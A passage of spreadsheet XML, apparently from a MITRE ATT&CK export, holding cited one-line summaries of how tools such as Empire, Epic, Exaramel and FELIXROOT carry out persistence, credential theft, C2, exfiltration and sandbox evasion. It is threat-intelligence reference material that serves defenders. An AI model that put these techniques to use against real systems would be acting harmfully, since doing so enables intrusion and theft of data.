    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) has been observed creating new services to maintain persistence. (Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018) </t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-TokenManipulation&lt;/code&gt; to manipulate access tokens.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can ZIP directories on the target system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use TLS to encrypt its C2 channel.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Dropbox and GitHub for C2.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to gather browser data such as bookmarks and visited sites.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes various modules to attempt to bypass UAC for escalation of privileges.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can harvest clipboard data on both Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) uses a command-line interface to interact with systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use &lt;code&gt;Invoke-RunAs&lt;/code&gt; to make tokens.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains some modules that leverage API hooking to carry out tasks, such as netripper.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use various modules to search for files containing passwords.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use modules that extract passwords from common web browsers such as Firefox and Chrome.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit various DLL hijacking opportunities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can utilize &lt;code&gt;Invoke-DCOM&lt;/code&gt; to leverage remote COM execution for lateral movement.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can acquire local and domain user account information.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a module for creating a new domain user if permissions allow.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has modules for enumerating domain trusts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a dylib hijacker module that generates a malicious dylib given the path to a legitimate dylib of a vulnerable application.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can send data gathered from a target through the command and control channel.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Dropbox for data exfiltration.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Exfiltration to Code Repository</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use GitHub for data exfiltration.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can exploit vulnerabilities such as MS16-032 and MS16-135.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes various modules for finding files of interest on hosts and network shares.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Golden Ticket</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage its implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to obtain and use golden tickets.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; to modify a GPO that will install and execute a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053).(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can upload and download to and from a victim machine.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) uses [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-Kerberoast&lt;/code&gt; to request service tickets and return crackable ticket hashes.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes keylogging capabilities for Windows, Linux, and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.(Citation: Github PowerShell Empire)(Citation: GitHub Inveigh)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains an implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to gather credentials from memory.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a module for creating a local user if permissions allow.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to collect emails on a target system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>MSBuild</t>
  </si>
  <si>
    <t xml:space="preserve">[Empire](https://attack.mitre.org/software/S0363) can use built-in modules to abuse trusted utilities like MSBuild.exe.(Citation: Github PowerShell Empire)
</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains a variety of enumeration modules that have an option to use API calls to carry out tasks.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can perform port scans from an infected host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can find shared drives on the local system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can be used to conduct packet captures on target hosts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to obfuscate commands using &lt;code&gt;Invoke-Obfuscation&lt;/code&gt;.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can perform pass the hash attacks.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Path Interception by PATH Environment Variable</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit path interception opportunities in the PATH environment variable.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit search order hijacking vulnerabilities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Path Interception by Unquoted Path</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit unquoted path vulnerabilities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) leverages PowerShell for the majority of its client-side agent tasks. [Empire](https://attack.mitre.org/software/S0363) also contains the ability to conduct PowerShell remoting with the &lt;code&gt;Invoke-PSRemoting&lt;/code&gt; module.(Citation: Github PowerShell Empire)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use modules like &lt;code&gt;Invoke-SessionGopher&lt;/code&gt; to extract private key and session information.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can find information about processes running on local and remote systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains multiple modules for injecting into processes, such as &lt;code&gt;Invoke-PSInject&lt;/code&gt;.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can modify the registry run keys &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can add a SID-History to a user if on a domain controller.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules for executing commands over SSH as well as in-memory VNC agent injection.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has modules to interact with the Windows task scheduler.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) is capable of capturing screenshots on Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate antivirus software on the target.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate Security Support Providers (SSPs) as well as utilize [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Install-SSP&lt;/code&gt; and &lt;code&gt;Invoke-Mimikatz&lt;/code&gt; to install malicious SSPs and log authentication events.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use [PsExec](https://attack.mitre.org/software/S0029) to execute a payload on a remote host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can persist by modifying a .LNK file to include a backdoor.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Silver Ticket</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage its implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to obtain and use silver tickets.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate host system information like OS, architecture, applied patches, and more.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can acquire network configuration information like DNS servers and network proxies used by a host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate the current network connections of a host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can timestomp any files or payloads placed on a target machine to help them blend in.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can capture webcam data on Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can conduct command and control over protocols like HTTP and HTTPS.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has modules for executing scripts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t xml:space="preserve">[Empire](https://attack.mitre.org/software/S0363) can use WMI to deliver a payload to a remote host.(Citation: Github PowerShell Empire) </t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can utilize built-in modules to modify service binaries and restore them to their original state.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) encrypts collected data using a public key framework before sending it over the C2 channel.(Citation: Kaspersky Turla) Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) compresses the collected data with bzip2 before sending it to the C2 server.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used valid digital certificates from Sysprint AG to sign its [Epic](https://attack.mitre.org/software/S0091) dropper.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.(Citation: ESET Recon Snake Nest)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) has a command to delete a file from the machine.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\Temp directories.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) gathers a list of all user accounts, privilege classes, and time of last logon.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) gathers information on local group names.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) heavily obfuscates its code to make analysis more difficult.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;tasklist /v&lt;/code&gt; command to obtain a list of processes.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;rem reg query&lt;/code&gt; command to obtain values from Registry keys.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net view&lt;/code&gt; command on the victim’s machine.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) searches for anti-malware services running on the victim’s machine and terminates itself if it finds them.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) encrypts commands from the C2 server using a hardcoded key.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;nbtstat -n&lt;/code&gt; and &lt;code&gt;nbtstat -s&lt;/code&gt; commands on the victim’s machine.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net use&lt;/code&gt;, &lt;code&gt;net session&lt;/code&gt;, and &lt;code&gt;netstat&lt;/code&gt; commands to gather information on network connections.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) collects the user name from the victim’s machine.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;tasklist /svc&lt;/code&gt; command to list the services on the system.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net time&lt;/code&gt; command  to get the system time from the machine and collect the current date and time zone information.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses HTTP and HTTPS for C2 communications.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has deleted the initial dropper after running through the environment checks.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has downloaded additional Lua scripts from the C2.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used various API calls as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used EnumProcesses() to identify how many process are running in the environment.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has created Registry keys for persistence in &lt;code&gt;[HKLM|HKCU]\…\CurrentVersion\Run&lt;/code&gt;.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has executed commands via scheduled tasks.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has been observed querying installed antivirus software.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396)'s dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used the API calls NtQuerySystemTime, GetSystemTimeAsFileTime, and GetTickCount to gather time metrics as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used time measurements from 3 different APIs before and after performing sleep operations to check and abort if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has executed C2 commands directly via HTTP.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has an integrated scripting engine to download and execute Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used WMI to gather information about the system.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture audio from a victim machine.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture keystrokes.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) adds a Registry Run key for ctfmon.exe to establish persistence.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture screenshots.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture video from a victim machine.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses crontab for persistence if it does not have root privileges.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can decrypt its configuration file.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can attempt to find a new C2 server if it receives an error.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can uninstall its persistence mechanism and delete its configuration file.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a command to download a file from  and to a remote C2 server.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses RC4 for encrypting the configuration.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can execute commands with high privileges via a specific binary with setuid functionality.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can run &lt;code&gt;whoami&lt;/code&gt; to identify the system owner.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a hardcoded location under systemd that it uses to achieve persistence if it is running as root.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a command to execute a shell command on the system.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses HTTPS for C2 communications.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Exaramel for Windows](https://attack.mitre.org/software/S0343) automatically encrypts files before sending them to the C2 server.(Citation: ESET TeleBots Oct 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Exaramel for Windows](https://attack.mitre.org/software/S0343) specifies a path to store files scheduled for exfiltration.(Citation: ESET TeleBots Oct 2018) </t>
  </si>
  <si>
    <t>The [Exaramel for Windows](https://attack.mitre.org/software/S0343) dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV” in an apparent attempt to masquerade as a legitimate service.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) adds the configuration to the Registry in XML format.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) has a command to execute VBS scripts on the victim’s machine.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) has a command to launch a remote shell and executes commands on the victim’s machine.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>The [Exaramel for Windows](https://attack.mitre.org/software/S0343) dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV.”(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to decompress a local or remote CAB file into an executable.(Citation: Microsoft Expand Utility)</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to download or upload a file over a network share.(Citation: LOLBAS Expand)</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to download or copy a file into an alternate data stream.(Citation: LOLBAS Expand)</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to use the OpenClipboard wrapper.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) can scan all .exe files located in the USB drive.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>[Explosive](https://attack.mitre.org/software/S0569) has commonly set file and path attributes to hidden.(Citation: CheckPoint Volatile Cedar March 2015)</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to download a file to the infected system.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has leveraged its keylogging capabilities to gain access to administrator accounts on target servers.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to write itself to Registry values.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to call the OpenClipboard wrapper.(Citation: CheckPoint Volatile Cedar March 2015)  </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has encrypted communications with the RC4 method.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has collected the computer name from the infected host.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve"> [Explosive](https://attack.mitre.org/software/S0569) has collected the MAC address from the victim's machine.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has collected the username from the infected host.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>[Explosive](https://attack.mitre.org/software/S0569) has used HTTP for communication.(Citation: CheckPoint Volatile Cedar March 2015)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can delete malware and associated artifacts from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can search files on a victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) uses fake Transport Layer Security (TLS) to communicate with its C2 server.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) encrypts C2 data with RC4 encryption.(Citation: US-CERT FALLCHILL Nov 2017)(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) collects MAC address and local IP address information from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can modify file or directory timestamps.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) has been installed as a Windows service.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) encrypts collected data with AES and Base64 and then sends it to the C2 server.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) deletes the .LNK file from the startup directory as well as the dropper components.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) downloads and uploads files to and from the victim’s machine.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) deletes the Registry key &lt;code&gt;HKCU\Software\Classes\Applications\rundll32.exe\shell\open&lt;/code&gt;.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) encrypts strings in the backdoor using a custom XOR algorithm.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects a list of running processes.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) queries the Registry for specific keys for potential privilege escalation and proxy information. [FELIXROOT](https://attack.mitre.org/software/S0267) has also used WMI to query the Windows Registry.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) adds a shortcut file to the startup folder for persistence.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
